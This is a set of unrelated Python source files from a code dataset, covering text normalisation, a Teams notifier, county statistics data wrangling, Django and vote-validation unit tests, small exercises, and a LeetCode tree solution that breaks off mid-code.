+{"seq_id":"247507371","text":"from pymorphy2 import MorphAnalyzer\nimport re\n\n\n# Object used to normalize words\nmorph = MorphAnalyzer()\n\n# Length of the n-grams\nn_gramm_value = 3\n\n# Maximum allowed Damerau-Levenshtein distance\nmaxDistanceInReplaceCheck = 1\n\n# Probability assigned to words found by fuzzy search over the Damerau-Levenshtein distance\nprobabilityForFoundWordsInReplace = 1\n\n# Cost of deleting a character\ndamerauDeleteCost = 1\n\n# Cost of inserting a character\ndamerauInsertCost = 1\n\n# Cost of replacing a character\ndamerauReplaceCost = 1\n\n# Cost of transposing characters\ndamerauTransposeCost = 1\n\n\ndef normalize_hashtag(hashtag):\n    \"\"\"\n    Process an input hashtag so that only letters remain.\n    All hashtags must end up in one form so they can be compared with each other.\n\n    :param hashtag: input hashtag\n    :return: processed hashtag\n    \"\"\"\n\n    result = \"\".join(re.findall(r\"\\w*\", hashtag)).lower()\n    return result\n\n\ndef normalize_word(word):\n    \"\"\"\n    Get the normal form of a word (e.g. гуляла -> гулять)\n\n    :param word: word\n    :return: normal form of the word\n    \"\"\"\n\n    result = morph.parse(word)[0].normal_form.lower()\n    return result\n\n\ndef lemm_list(split_str):\n    \"\"\"\n    Get the list of normalized words from a list of words\n\n    :param split_str: list of words\n    :return: list of normalized words\n    \"\"\"\n\n    lemmas = []\n    for el in split_str:\n        lemmas.append(normalize_word(el))\n    return lemmas\n\n\ndef make_n_gramms(input_str):\n    \"\"\"\n    Get the n-grams of a string\n\n    :param input_str: string\n    :return: list of n-grams\n    \"\"\"\n\n    result = []\n    for i in range(n_gramm_value, len(input_str) + 1):\n        result.append(input_str[i - n_gramm_value: i])\n\n    return result\n\n\ndef get_words(hashtag):\n    \"\"\"\n    Split a string into words on spaces, removing the hash sign first\n\n    :param hashtag: input string\n    :return: list of words\n    \"\"\"\n\n    hashtag = hashtag.replace(\"#\", \"\")\n\n    return hashtag.split(\" \")\n\n\ndef damerau(s, t):\n    \"\"\"\n    Compute the Damerau-Levenshtein distance (edit distance with transposition)\n\n    :param s: string 1\n    :param t: string 2\n    :return: distance between the strings\n    \"\"\"\n\n    if s == t:\n        return 0\n    elif len(s) == 0:\n        return len(t)\n    elif len(t) == 0:\n        return len(s)\n\n    deleteCost = damerauDeleteCost\n    insertCost = damerauInsertCost\n    replaceCost = damerauReplaceCost\n    transposeCost = damerauTransposeCost\n\n    s = \" \" + s\n    t = \" \" + t\n    M = len(s)\n    N = len(t)\n    d = [list(range(N))]\n    for i in range(1, M):\n        d.append([])\n        for j in range(N):\n            d[i].append(0)\n        d[i][0] = i\n\n    for i in range(1, M):\n        for j in range(1, N):\n            # replacement cost\n            if s[i] == t[j]:\n                d[i][j] = d[i - 1][j - 1]\n            else:\n                d[i][j] = d[i - 1][j - 1] + replaceCost\n            d[i][j] = min(\n                d[i][j],  # replacement\n                d[i - 1][j] + deleteCost,  # deletion\n                d[i][j - 1] + insertCost  # insertion\n            )\n\n            if i > 1 and j > 1 and s[i] == t[j - 1] and s[i - 1] == t[j]:\n                d[i][j] = min(\n                    d[i][j],\n                    d[i - 2][j - 2] + transposeCost  # transposition\n                )\n    return d[M - 1][N - 1]\n\n\ndef get_result_by_damerau(word, dict_word):\n    \"\"\"\n    Linear fuzzy search of words against a dictionary using the Damerau-Levenshtein distance\n\n    :param word: words to search for\n    :param dict_word: dictionary searched against\n    :return: dict mapping matched words to their scores\n    \"\"\"\n\n    gramms_selection = {}\n    for el in dict_word:\n        for w in word:\n            dist = damerau(el, w)\n            if dist < 2:\n                gramms_selection[w] = (2 - dist) * 0.5\n\n    return gramms_selection\n","sub_path":"scripts/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"6146307","text":"import pymsteams\nimport sys\nsys.path.insert(0, '<>') #change for config path\nimport config #imports variables from config.py file\n\ndef sendError(errorHook, service, date, error):\n    #channel URL\n    teamsURL = config.errorHook\n    myTeamsMessage = pymsteams.connectorcard(teamsURL)\n    myTeamsMessage.title(\"TEST REPORT ERROR FOR \" + str(service))\n    myTeamsMessage.text(\"Test run at \" + str(date))\n    #section with the up services\n    myMessageSection = pymsteams.cardsection()\n    myMessageSection.activityTitle(service)\n    myMessageSection.activityText(str(error))\n    myTeamsMessage.addSection(myMessageSection)\n    myTeamsMessage.send()","sub_path":"methods/sendError.py","file_name":"sendError.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"98123552","text":"'''\nCounty Stats Upload\nKHESS 2018-11-8\n'''\n\nimport pandas as pd\nimport time\nimport re\nimport os\nimport sys\n\n\n#FILE LOCATION\n'''Home Directory''' #UPDATE THIS LOCATION FOR ALL FILES\ninputpath = '/Users/kellyhess/LGDR/CountyStatData/'\n\n'''\nfilenames notes\nallhlcn172.xlsx 17 is year, 2 is 2nd quarter\nCA1_1969_2016_SC.csv CA1 is table 
name\nlaucnty17.xlsx 17 is year\n'''\n\n#File targets -- UPDATE TO MATCH FILENAMES\ntargetfiles = {'empsectors' : 'allhlcn172.xlsx',\n 'persincome' : 'CA1_1969_2016_SC.csv',\n 'employment' : 'laucnty17.xlsx',\n 'population' : 'proj2020.csv'\n }\n\nworkbooktargets = { 'persincome' : { 'tab' : targetfiles['persincome'][:-4] + ' - Personal Inc',\n 'Description' : \"Personal income (thousands of dollars)\"\n },\n 'empsectors' : { 'tab' : 'US_St_Cn_MSA',\n 'tabcol' : 'June Employment',\n 'areatype' : 'County',\n 'stname' : 'South Carolina',\n 'ownership' : ['Private',\n 'Local Government',\n 'State Government',\n 'Federal Government']\n },\n 'population' : { 'tab' : targetfiles['population'][:-4],\n 'column' : 'July 1, 2018 Projection' #NEEDS TO BE UPDATED FOR YEAR!!\n },\n 'employment' : { 'tab' : targetfiles['employment'][:-5],\n 'columns' : [ 'County Name/State Abbreviation',\n 'Force',\n 'Employed',\n 'Unemployed',\n '(%)']\n }\n }\n\n#Make Ratings & CountySeat tabs\nRatings = pd.DataFrame(columns = ['County','FiscalYear','Moodys',\n 'Standard&Poors','DataDate'])\nCountySeat = pd.DataFrame({'County' : ['Abbeville',\n 'Aiken',\n 'Allendale',\n 'Anderson',\n 'Bamberg',\n 'Barnwell',\n 'Beaufort',\n 'Berkeley',\n 'Calhoun',\n 'Charleston',\n 'Cherokee',\n 'Chester',\n 'Chesterfield',\n 'Clarendon',\n 'Colleton',\n 'Darlington',\n 'Dillon',\n 'Dorchester',\n 'Edgefield',\n 'Fairfield',\n 'Florence',\n 'Georgetown',\n 'Greenville',\n 'Greenwood',\n 'Hampton',\n 'Horry',\n 'Jasper',\n 'Kershaw',\n 'Lancaster',\n 'Laurens',\n 'Lee',\n 'Lexington',\n 'Marion',\n 'Marlboro',\n 'Mccormick',\n 'Newberry',\n 'Oconee',\n 'Orangeburg',\n 'Pickens',\n 'Richland',\n 'Saluda',\n 'Spartanburg',\n 'Sumter',\n 'Union',\n 'Williamsburg',\n 'York'],\n 'CountySeat' : ['Abbeville',\n 'Aiken',\n 'Allendale',\n 'Anderson',\n 'Bamberg',\n 'Barnwell',\n 'Beaufort',\n 'Moncks Corner',\n 'St. Matthews',\n 'Charleston',\n 'Gaffney',\n 'Chester',\n 'Chesterfield',\n 'Manning',\n 'Walterboro',\n 'Darlington',\n 'Dillon',\n 'St. George',\n 'Edgefield',\n 'Winnsboro',\n 'Florence',\n 'Georgetown',\n 'Greenville',\n 'Greenwood',\n 'Hampton',\n 'Conway',\n 'Ridgeland',\n 'Camden',\n 'Lancaster',\n 'Laurens',\n 'Bishopville',\n 'Lexington',\n 'Marion',\n 'Bennettsville',\n 'McCormick',\n 'Newberry',\n 'Walhalla',\n 'Orangeburg',\n 'Pickens',\n 'Columbia',\n 'Saluda',\n 'Spartanburg',\n 'Sumter',\n 'Union',\n 'Kingstree',\n 'York']})\nCountySeat['DataDate'] = '08/15/2018'\n\n#DF STUFF\nproblemfiles = []\ncurdate = time.strftime('%m/%d/%Y')\nexportdate = time.strftime('%m-%d-%Y')\ncolumnorder = { 'persincome' : ['County','FiscalYear','PersonalIncome','DataDate'],\n 'population' : ['County','FiscalYear','Population','DataDate' ],\n 'empsectors' : ['County','FiscalYear','Sector','Value','DataDate'],\n 'employment' : ['County','FiscalYear','LaborForce','Employed','Unemployed','Rate','DataDate']\n }\ndfs2send = {}\n\n#FISCAL YEAR INPUT\nfiscYr = input('What fiscal year? MM/DD/YYYY')\nif len(fiscYr) < 10:\n fiscYr = '06/30/2018'\n\n#file error handling ... 
can't find\ndef read_file(file2open):\n if 'xls' in file2open:\n try:\n xlfile = pd.read_excel(file2open)\n return xlfile\n except:\n print (\"Can't read xls file \",file2open)\n problemfiles.append(file2open)\n elif 'csv' in file2open:\n try:\n csvfile = pd.read_csv(file2open)\n return csvfile\n except:\n print (\"Can't read csv file \",file2open)\n problemfiles.append(file2open)\n\n#filters ownership data for empsectors\ndef filter_ownership(x):\n if re.search(gardata, x['Area']): return False\n elif x['Ownership'] in workbooktargets['empsectors']['ownership']:\n #remove subtotals from Private Ownership\n if x['Ownership'] == 'Private':\n if re.search(indregex, x['Industry']):\n return True\n else: return False\n return True\n else: return False\n\ndef check_if_files_exist(file2open, expectedfile):\n if not os.path.isfile(file2open):\n print (\"Can't find file \",expectedfile,\". Check file targets against what's in directory\")\n sys.exit()\n\n\n#IMPORT AND WRANGLE\nfor target, targetfile in targetfiles.items():\n #print 'Target ', target\n print ('Reading ',targetfile)\n #build file path\n filepath = inputpath + targetfile\n\n #check filenames\n check_if_files_exist(filepath, targetfile)\n\n #read file\n df = read_file(filepath)\n\n if target == 'persincome':\n #find last column in df\n maxcol = len(df.columns)\n psincm = df.iloc[:,[1,6,(maxcol-1)]].dropna(how = 'any') #rows, column list\n\n #remove SC totals\n totalfilter = psincm['GeoName'].str.contains('South Carolina state total')\n psincm = psincm[~totalfilter] #tilde reverses T/F\n\n #remove all lines except personal Income\n perinfilter = psincm['Description'].str.contains(workbooktargets[target]['Description'], \\\n regex = False)\n psincm = psincm[perinfilter]\n\n #drop Description\n psincm = psincm.drop(['Description'], axis = 1)\n\n #normalize county names\n psincm = psincm.replace({'GeoName': r', SC'}, \\\n {'GeoName': ''}, regex = True)\n\n #rename columns\n psincm.columns = ['County', 'PersonalIncome']\n\n #add additional information\n psincm['FiscalYear'] = fiscYr\n psincm['DataDate'] = curdate\n\n #reorder columns\n PersonalIncome = psincm[columnorder[target]]\n\n #append to send\n dfs2send['PersonalIncome'] = PersonalIncome\n\n #print PersonalIncome.head()\n\n elif target == 'empsectors':\n #Subset for SC counties\n cdtemp = df[(df['Area Type'] == workbooktargets[target]['areatype']) & \\\n (df['St Name'] == workbooktargets[target]['stname'])]\n\n #Pick up columns for output\n cdtemp = cdtemp.iloc[:,[9,10,11,16]] #rows, columns\n\n #filters data for target ownership data, handles subtotals in private\n #removes unknown counties\n indregex = '^[0-9]{4}\\s' #begin with a 4 digit numeric\n gardata = 'Unknown'\n yasdata = cdtemp.apply(filter_ownership, axis = 1)\n countydata = cdtemp[yasdata]\n\n #remove numbers from Industry text\n #regex: beginning line characters repeating 0-9, 1 whitespace\n countydata = countydata.replace({'Industry': r'^[0-9]+\\s'}, \\\n {'Industry': ''}, regex = True)\n\n #remove County, South Carolina from Area\n countydata = countydata.replace({'Area': r'\\sCounty, South Carolina'}, \\\n {'Area': ''}, regex = True)\n\n #add fiscal year and export date\n countydata['FiscalYear'] = fiscYr\n countydata['DataDate'] = curdate\n\n #REFORMAT FOR OUTPUT\n #Govt\n exportgovt = countydata[(countydata['Ownership'] != 'Private')]\\\n .drop(['Industry'], axis = 1)\n exportgovt.columns = ['County','Sector','Value','FiscalYear','DataDate']\n exportgovt = exportgovt[columnorder[target]]\n\n #Private\n exportpriv 
= countydata[(countydata['Ownership'] == 'Private')]\\\n .drop(['Ownership'], axis = 1)\n exportpriv.columns = ['County','Sector','Value','FiscalYear','DataDate']\n exportpriv = exportpriv[columnorder[target]]\n\n #combine dfs\n DFS = [exportgovt, exportpriv]\n EmpSectors = pd.concat(DFS)\n\n #append df to send list // [tab name] = df\n dfs2send['EmploymentSectors'] = EmpSectors\n\n #print EmpSectors.head()\n\n elif target == 'population':\n #subset population projection, remove NANs\n Population = df.loc[:,['County',workbooktargets[target]['column']]]\\\n .dropna()\n #remove SC total\n Population = Population[Population['County'] != 'South Carolina']\n\n #rename columns\n Population.columns = ['County', 'Population']\n\n #add addtional columns\n Population['DataDate'] = curdate\n Population['FiscalYear'] = fiscYr\n\n #reorder columns\n Population = Population[columnorder[target]]\n\n #append to send\n dfs2send['Population'] = Population\n\n elif target == 'employment':\n #get target columns\n labor = df.iloc[5:,[1,3,6,7,8,9]].dropna()\n\n #get SC data\n labor = labor[labor.iloc[:,0] == '45']\n\n #drop state code\n labor = labor.drop(['Unnamed: 1'], axis = 1)\n\n #rename columns\n labor.columns = ['County','LaborForce','Employed','Unemployed',\n 'Rate']\n\n #normalize county names, removing suffix County, SC\n labor = labor.replace({'County' : r'\\sCounty, SC'}, \\\n {'County' : ''}, regex = True)\n\n #add additional info\n labor['FiscalYear'] = fiscYr\n labor['DataDate'] = curdate\n\n #reorder columns\n Employment = labor[columnorder[target]]\n\n #append to send\n dfs2send['Employment'] = Employment\n\n #add holder tabs\n dfs2send['Ratings'] = Ratings\n dfs2send['CountySeat'] = CountySeat\n\nprint ('Data wrangling complete!')\nprint ('Exporting...')\n#trim?\n\n#WRITE TO EXCEL\n#set tab order for writer\ntaborder = { 1 : 'Ratings',\n 2 : 'PersonalIncome',\n 3 : 'Population',\n 4 : 'EmploymentSectors',\n 5 : 'Employment',\n 6 : 'CountySeat'}\n\n#filename of output workbook\nwriter = pd.ExcelWriter(inputpath+'CountyStatsData_'+exportdate+'.xlsx')\n\n#write dfs to excel file\nfor key, targ in taborder.items():\n df = dfs2send.get(targ, 'Key not found.')\n print ('Writing ',targ)\n df.to_excel(writer, sheet_name = targ, index = False)\n'''\nfor key, df in dfs2send.items():\n df.to_excel(writer, sheet_name = key, index = False)\n'''\nwriter.save()\nwriter.close()\n\n\nprint ('Problem files: ',problemfiles)\nprint ('Complete!')\n","sub_path":"code/countystats_3.py","file_name":"countystats_3.py","file_ext":"py","file_size_in_byte":14808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"588301233","text":"from contextlib import contextmanager\nfrom django.conf import settings\nfrom django.test import TestCase\n\nfrom .factories import UserFactory\n\nclass ScenarioTestCase(TestCase):\n @contextmanager\n def log_user(self, user=None):\n if user is not None:\n self.client.login(username=user.username, password='password')\n try:\n yield\n finally:\n if user is not None:\n self.client.logout()\n\n @classmethod\n def setUpTestData(cls):\n cls.user1 = UserFactory.create()\n # Add here more users if needed\n\n def setUp(self):\n self.no_user_logged_in_scenario = cls.log_user(None)\n self.user1_logged_in_scenario = cls.log_user(self.user1)\n # Add here any other scenario you'd 
like\n","sub_path":"ispa/events/tests/test_setupdata.py","file_name":"test_setupdata.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563294332","text":"from django.core import mail\nfrom django.test import TestCase\nfrom django.shortcuts import resolve_url as r\n\n\nclass SubscribePostValid(TestCase):\n\n def setUp(self):\n data = dict(name='Orlando Saboia', cpf='12345678901',\n email='fobs@bol.com.br', phone='86-12345-6789')\n\n self.resp = self.client.post(r('subscriptions:new'), data)\n self.email = mail.outbox[0]\n\n def test_subscription_email_subject(self):\n expect = 'Confirmacao de Inscricao'\n\n self.assertEqual(expect,self.email.subject)\n\n\n def test_subscription_email_from(self):\n expect = 'contato@eventex.com.br'\n self.assertEqual(expect, self.email.from_email)\n\n def test_subscription_email_to(self):\n expect = ['contato@eventex.com.br','fobs@bol.com.br']\n\n self.assertEqual(expect, self.email.to)\n\n def test_subscription_email_body(self):\n contents = [\n 'Orlando Saboia',\n '12345678901',\n 'fobs@bol.com.br',\n '86-12345-6789'\n ]\n for content in contents:\n with self.subTest():\n self.assertIn(content, self.email.body)\n\n","sub_path":"eventex/subscriptions/tests/test_mail_subscribe.py","file_name":"test_mail_subscribe.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"507570627","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport math as m\nX = [1., 2., 3.]\nY = [1., 2., 3.]\nm = n_samples = len(X)\n\nW = tf.exp(3.)\n\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nprint(sess.run(W))","sub_path":"lab5/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249191213","text":"\"\"\"\nTests in standalone fashion the vote-validation interface\n\"\"\"\n\nimport pytest\nimport unittest\nimport json\nfrom copy import deepcopy\nfrom zeus_core.election.interfaces.vote_handlers import VoteValidator\nfrom zeus_core.election.exceptions import InvalidVoteError\nfrom tests.election.utils import display_json, adapt_vote\nfrom tests.election.makers import mk_voting_setup\n\n\nclass DummyVoteValidator(VoteValidator):\n \"\"\"\n Minimal implementation of vote validation interface for testing purposes\n \"\"\"\n def __init__(self, election):\n self.election = election\n self.cryptosys = election.get_cryptosys()\n\n def get_cryptosys(self):\n return self.cryptosys\n\n def get_crypto_params(self):\n return self.election.get_crypto_params()\n\n def get_election_key(self):\n return self.election.get_election_key()\n\n def get_candidates(self):\n return self.election.get_candidates()\n\n def get_audit_votes(self):\n return self.election.get_audit_votes()\n\n def extract_vote(self, vote):\n return self.election.extract_vote(vote)\n\n def serialize_encrypted_ballot(self, encrypted_ballot):\n serialized = self.election.serialize_encrypted_ballot(encrypted_ballot)\n return serialized\n\n def deserialize_encrypted_ballot(self, alpha, beta,\n commitment, challenge, response):\n deserialized = self.election.deserialize_encrypted_ballot(\n alpha, beta, commitment, challenge, response)\n return deserialized\n\n\nclass TestValidations(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n election = mk_voting_setup()\n\n cls.election = 
election\n cls.cryptosys = election.get_cryptosys()\n cls.validator = DummyVoteValidator(election)\n cls.voter = election.get_voter_clients()[0]\n cls.messages = []\n\n @classmethod\n def tearDownClass(cls):\n print('\\n')\n for message in cls.messages:\n print(message)\n\n\n def get_context(self):\n election = __class__.election\n cryptosys = __class__.cryptosys\n validator = __class__.validator\n voter = __class__.voter\n messages = __class__.messages\n\n return election, cryptosys, validator, voter, messages\n\n\n def __fail(self, err):\n __class__.messages.append(f'[-] {err}')\n self.fail(err)\n\n\n def test_vote_adaptment_success(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n vote = voter.mk_genuine_vote()\n adapted = adapt_vote(cryptosys, deepcopy(vote))\n try:\n assert adapted == validator.adapt_vote(vote)\n messages.append('[+] Vote successfully adapted')\n except AssertionError:\n err = 'Vote wrongly adapted'\n self.__fail(err)\n\n\n def mk_vote_adaptment_failures(self):\n \"\"\"\n \"\"\"\n election, cryptosys, validator, voter, messages = self.get_context()\n\n failures = []\n for index, msg in enumerate((\n 'Wrong or extra content',\n 'Malformed content',\n 'Cryptosystem mismatch',\n 'Election key mismatch',\n )):\n vote = voter.mk_genuine_vote()\n if index == 0:\n vote.update({'extra_key': 0})\n elif index == 1:\n del vote['encrypted_ballot']\n elif index == 2:\n vote['encrypted_ballot']['modulus'] += 1\n elif index == 3:\n vote['encrypted_ballot']['public'] += 1\n failures.append((msg, vote))\n return failures\n\n\n def test_vote_adaptment_failures(self):\n \"\"\"\n \"\"\"\n election, cryptosys, validator, voter, messages = self.get_context()\n\n failures = self.mk_vote_adaptment_failures()\n for err, vote in failures:\n with self.subTest(err=err, vote=vote):\n try:\n validator.adapt_vote(vote)\n except InvalidVoteError:\n messages.append(f'[+] No adaptment: {err} successfully detected')\n else:\n self.__fail(f'Wrong adaptment: {err} failed to be detected')\n\n\n def test_genuine_vote_validation_success(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n vote = voter.mk_genuine_vote()\n vote = adapt_vote(cryptosys, vote)\n try:\n validator.validate_genuine_vote(vote)\n messages.append('[+] Vote: Successfully validated')\n except InvalidVoteError:\n err = 'Valid vote erroneously invalidated'\n self.__fail(err)\n\n\n def test_genuine_vote_validation_failures(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n err = 'Invalid vote failed to be detected'\n for kwargs, msg in (\n ({'corrupt_proof': True}, 'invalid encryption'),\n ({'corrupt_fingerprint': True}, 'fingerprint mismatch'),\n ):\n vote = voter.mk_genuine_vote(**kwargs)\n with self.subTest(vote=vote):\n vote = adapt_vote(cryptosys, vote)\n try:\n validator.validate_genuine_vote(vote)\n except InvalidVoteError:\n messages.append(f'[+] Vote: Invalid detected ({msg})')\n else:\n self.__fail(f'{err} ({msg})')\n\n\n def test_audit_vote_validation_success(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n audit_vote = voter.mk_audit_vote()\n audit_vote = adapt_vote(cryptosys, audit_vote)\n missing, failed = validator.validate_audit_votes(audit_votes=[audit_vote,])\n try:\n assert not missing and not failed\n messages.append('[+] Audit-vote: Successfully validated')\n except AssertionError:\n err = 'Valid audit-vote erroneously invalidated'\n self.__fail(err)\n\n\n def test_audit_vote_validation_failures(self):\n election, 
cryptosys, validator, voter, messages = self.get_context()\n\n err = 'Invalid audit-vote failed to be detected'\n for kwargs, msg in (\n ({'missing': True}, 'missing secret'),\n ({'corrupt_proof': True}, 'invalid encryption'),\n ({'corrupt_alpha': True}, 'invalid secret'),\n ({'corrupt_encoding': True}, 'max-gamma exceeded'),\n ):\n if msg == 'max-gamma exceeded':\n # ~ Dramatically reduce the number of candidates so that\n # ~ decrypting the ballot with the voter's secret\n # ~ exceeds max-gamma encoding of their number\n save_candidates = election.get_candidates()\n election.set_candidates(save_candidates[:1])\n fake_nr_candidates = len(election.get_candidates())\n kwargs.update({'fake_nr_candidates': fake_nr_candidates})\n audit_vote = voter.mk_audit_vote(**kwargs)\n with self.subTest(audit_vote=audit_vote):\n audit_vote = adapt_vote(cryptosys, audit_vote)\n missing, failed = validator.validate_audit_votes((audit_vote,))\n try:\n if msg == 'missing secret':\n assert missing == [audit_vote,] and not failed\n else:\n assert not missing and failed == [audit_vote,]\n messages.append(f'[+] Audit-vote: Invalid detected ({msg})')\n except AssertionError:\n self.__fail(f'{err} ({msg})')\n if msg == 'max-gamma exceeded':\n election.set_candidates(save_candidates) # Restore for subsequent tests\n\n\nif __name__ == '__main__':\n print('\\n====================== Testing vote validations ======================')\n unittest.main()\n","sub_path":"tests/election/interfaces/test_vote_validation.py","file_name":"test_vote_validation.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"572605460","text":"import math\n\n\n# Zad1\n\n\nclass Point:\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, val):\n self.__x = val\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, val):\n self.__y = val\n\n def __init__(self):\n self.x = 0\n self.y = 0\n\n\n# punkt = Point()\n# punkt.x = 12\n# print(punkt.x)\n\n\n# Zad2\n\ndef dek(punkt1, punkt2):\n def dek2(fun):\n def inner(p1, p2):\n if punkt1 <= p1.x <= punkt2 and punkt1 <= p1.y <= punkt2 and punkt1 <= p2.x <= punkt2 and punkt1 <= p2.y <= punkt2:\n return fun(p1, p2)\n else:\n raise ArithmeticError\n\n return inner\n\n return dek2\n\n\n@dek(-5, 5)\ndef add(p1, p2):\n p = Point()\n p.x = p1.x + p2.x\n p.y = p1.y + p2.y\n return p\n\n\np1 = Point()\np2 = Point()\np1.x = 12\np1.y = -12\n\np2.x = -2\np2.y = 2\n\n# print(add(p1, p2))\nprint(add(p2, p2))\n\n\n@dek(-5, 5)\ndef sub(p1, p2):\n p = Point()\n p.x = p1.x - p2.x\n p.y = p1.y - p2.y\n return p\n\n\n# print(sub(p2, p1))\nprint(sub(p2, p2))\n\n\n# Zad3\n\n\nclass Zad3():\n\n @staticmethod\n def count_area(p1, p2, p3, p4=None):\n if p4 is None:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p1.x, 2) + math.pow(p3.y - p1.y, 2))\n p = (a + b + c) / 2 # semi-perimeter, as Heron's formula requires\n return math.sqrt(p * (p - a) * (p - b) * (p - c))\n else:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p4.x, 2) + math.pow(p3.y - p4.y, 2))\n d = math.sqrt(math.pow(p4.x - p1.x, 2) + math.pow(p4.y - p1.y, 2))\n p = (a + b + c + d) / 2 # semi-perimeter, as Brahmagupta's formula requires\n return math.sqrt((p - a) * (p - b) * (p - c) * (p - d))\n\n @staticmethod\n def count_obwod(p1, p2, p3, p4=None):\n if p4 is None:\n a = math.sqrt(math.pow(p1.x - 
p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p1.x, 2) + math.pow(p3.y - p1.y, 2))\n return a + b + c\n else:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p4.x, 2) + math.pow(p3.y - p4.y, 2))\n d = math.sqrt(math.pow(p4.x - p1.x, 2) + math.pow(p4.y - p1.y, 2))\n return a + b + c + d\n\n\np3 = Point()\np3.x = 1\np3.y = 2\np4 = Point()\np4.x = 50\np4.y = 8\n\nprint(Zad3.count_obwod(p1, p2, p3))\nprint(Zad3.count_obwod(p1, p2, p3, p4))\n\nprint(Zad3.count_area(p1, p2, p3))\nprint(Zad3.count_area(p1, p2, p3, p4))\n\n\n# Zad4\n\n\nclass Zad4:\n counter = {}\n\n def __init__(self, fun):\n self.fun = fun\n Zad4.counter[fun] = 0\n\n def __call__(self, *args, **kwargs):\n Zad4.counter[self.fun] += 1\n self.fun(*args, **kwargs)\n\n @staticmethod\n def print_counter_static():\n for k, val in Zad4.counter.items():\n print(k, val)\n\n@Zad4\ndef fun1():\n pass\n\n@Zad4\ndef fun2():\n pass\n\n@Zad4\ndef fun3():\n pass\n\n\nfor i in range(120):\n fun1()\n for j in range(2):\n fun2()\n for k in range(9):\n fun3()\n\nprint(Zad4.print_counter_static())","sub_path":"Lab13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549805628","text":"\ndef decode(array, alphabet):\n return int(array in alphabet)\n\ndef num_ways(array, alphabet):\n array_len = len(array)\n ret = 0\n if array in alphabet:\n ret = 1\n #endif\n \"\"\" if array_len = 1, we cannot split it more \"\"\"\n if array_len == 1:\n return ret\n #endif\n for x in range(1, array_len):\n \"\"\" \n num_ways(---) -> \n 1: decode(-) + num_ways(--)\n 2: decode(--) + num_ways(-)\n \"\"\"\n ret += decode(array[x:], alphabet) * num_ways(array[:x], alphabet) \n #endif\n return ret\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"212070446","text":"#\n# [250] Count Univalue Subtrees\n#\n# https://leetcode.com/problems/count-univalue-subtrees/description/\n#\n# algorithms\n# Medium (44.41%)\n# Total Accepted: 23.7K\n# Total Submissions: 53.5K\n# Testcase Example: '[5,1,5,5,5,null,5]'\n#\n# Given a binary tree, count the number of uni-value subtrees.\n#\n# A Uni-value subtree means all nodes of the subtree have the same value.\n#\n# Example :\n#\n#\n# Input: root = [5,1,5,5,5,null,5]\n#\n# ⁠ 5\n# ⁠ / \\\n# ⁠ 1 5\n# ⁠ / \\ \\\n# ⁠ 5 5 5\n#\n# Output: 4\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def countUnivalSubtrees(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root is None:\n return 0\n self.res = 0\n self.DFS(root)\n return self.res\n\n def DFS(self, root):\n if root.left is None and root.right is None:\n self.res += 1\n return True\n if root.left is not None and root.right is not None:\n L, R = self.DFS(root.left), self.DFS(root.right)\n if L and R and root.left.val == root.val and root.right.val == root.val:\n self.res += 1\n return True\n elif root.left is not None:\n L = self.DFS(root.left)\n if L and root.left.val == root.val:\n self.res += 1\n return True\n elif root.right is not None:\n R = self.DFS(root.right)\n if R and 
